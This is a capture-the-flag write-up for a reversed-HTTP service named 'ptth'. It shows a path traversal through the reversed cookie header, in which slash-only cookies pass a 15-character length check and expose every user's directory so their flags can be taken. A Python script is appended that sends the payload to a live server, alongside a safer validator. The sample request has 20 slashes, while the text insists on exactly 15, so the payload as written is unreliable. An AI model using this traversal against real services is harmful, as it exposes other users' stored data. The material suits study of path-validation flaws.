@vladvis vladvis/ptth.md
Created May 29, 2019

ptth

The service speaks a reversed dialect of HTTP (ptth): the method TEG is GET spelled backwards, the version string PTTH\1.1 is HTTP/1.1 backwards, and the eikooc header is the reversed cookie. We noticed that the server logs debug info to stdout. Our first idea was path traversal, because the server stores files under names taken from the request: path = './' + eikooc + '/' + path. Path traversal through the request path didn't work at all, but eikooc (the reversed cookie) was used as the name of a user directory. So we sent this payload:

TEG / PTTH\1.1
eikooc: ../

And we got this log message:

[PID 19] [] TEG  SERVER

TEG / PTTH\1.1

eikooc: eikooc: ../

found cookie
[PID 20] [] Fucked up cookie. CLIENT

Ok, we checked the condition that produces this message:

if (some_function(some_ptr) == 15)
{
  ...
} else {
  throw_error("Fucked up cookie.");
}

Hmm, it looks like some_function is just strlen and some_ptr is the eikooc pointer: the cookie has to be exactly 15 characters long, which is why "../" (length 3) was rejected. So finally we sent a cookie made only of slashes (exactly 15 slashes in the eikooc), so that the length check passes while './' + eikooc + '/' still collapses to the directory that holds the user directories:

TEG / PTTH\1.1
eikooc: ////////////////////

and got back a directory listing (PTTH\0.1 2 KO is the reversed status line):

PTTH\0.1 2 KO
eikooc: ///////////////
eicookh: 093edf9115dc3ca072233b96e38f2752

<html><head>
<title>Index of data</title>
</head><body>
<h1>Index of data</h1>
<a href="./">(Parent Directory)</a><br>
<a href="data/MskBs9WDwWdlj1p">MskBs9WDwWdlj1p</a><br>
</body></html>

Got it! This response lists every user directory, so now we can extract all the flags the same way the checker does.
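As an added example (not part of the original writeup), here is a small Python script that reproduces the reasoning above: the quoted path construction, the strlen == 15 check, why "../" is rejected while fifteen slashes pass and still collapse to the listing directory, a builder for requests in the reversed dialect, a parser for the listing, and a stricter cookie check that would have blocked the trick. The directory name "data", CRLF line endings, and the host/port of the live service are assumptions.

```python
import os
import re
import socket
from typing import List, Optional

# Assumed: the listing title "Index of data" suggests the server's files live
# under a directory called "data"; the real directory name is not on the page.
BASE_DIR = "data"

# The response body quoted in the writeup, embedded so the parser runs offline.
SAMPLE_LISTING = """<html><head>
<title>Index of data</title>
</head><body>
<h1>Index of data</h1>
<a href="./">(Parent Directory)</a><br>
<a href="data/MskBs9WDwWdlj1p">MskBs9WDwWdlj1p</a><br>
</body></html>
"""


def server_path(eikooc: str, path: str) -> str:
    """Reproduce the construction quoted in the writeup,
    path = './' + eikooc + '/' + path, and normalise it the way the
    filesystem will when the server opens it."""
    return os.path.normpath("./" + eikooc + "/" + path)


def cookie_accepted(eikooc: str) -> bool:
    """The server's check, assuming some_function(some_ptr) == 15 is
    strlen(eikooc) == 15 as the writeup concludes (byte length, like strlen)."""
    return len(eikooc.encode()) == 15


def cookie_safe(eikooc: str, base_dir: str = BASE_DIR) -> bool:
    """A check that would have blocked the trick: the cookie must be a single
    path component and the resolved directory must stay under base_dir."""
    if not eikooc or eikooc in (".", "..") or "/" in eikooc or "\\" in eikooc:
        return False
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, eikooc))
    return os.path.commonpath([base, target]) == base


def build_ptth_request(path: str = "/", eikooc: Optional[str] = None) -> bytes:
    """Assemble a request in the reversed HTTP dialect shown in the writeup.
    Assumed: CRLF line endings, as in ordinary HTTP."""
    lines = [f"TEG {path} PTTH\\1.1"]
    if eikooc is not None:
        lines.append(f"eikooc: {eikooc}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode()


_HREF_RE = re.compile(r'href="([^"]+)"')


def usernames_from_listing(html: str) -> List[str]:
    """Pull the user directory names out of the 'Index of data' page,
    skipping the parent-directory link."""
    names = []
    for href in _HREF_RE.findall(html):
        if href in ("./", "../"):
            continue
        names.append(href.rstrip("/").rsplit("/", 1)[-1])
    return names


def fetch_listing(host: str, port: int, timeout: float = 5.0) -> str:
    """Send the 15-slash cookie to a live ptth server and return the raw
    response. Host and port are assumptions; this is not exercised offline."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_ptth_request("/", "/" * 15))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode(errors="replace")


if __name__ == "__main__":
    for cookie in ("../", "/" * 15, "MskBs9WDwWdlj1p"):
        print(f"{cookie!r:20} accepted={cookie_accepted(cookie)!s:5} "
              f"safe={cookie_safe(cookie)!s:5} -> {server_path(cookie, '')}")
    print("users in sample listing:", usernames_from_listing(SAMPLE_LISTING))
```

The strlen check is a length check, not a path check: any 15-byte string of slashes passes it, and the filesystem collapses the repeated separators so the server ends up listing its own data directory. cookie_safe rejects separators and verifies the resolved path stays under the base directory, which is the property the original check should have enforced.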

Our FB: FAUST_XOlUOAUHYk6BugAAAABMr89BM6YmLUIM
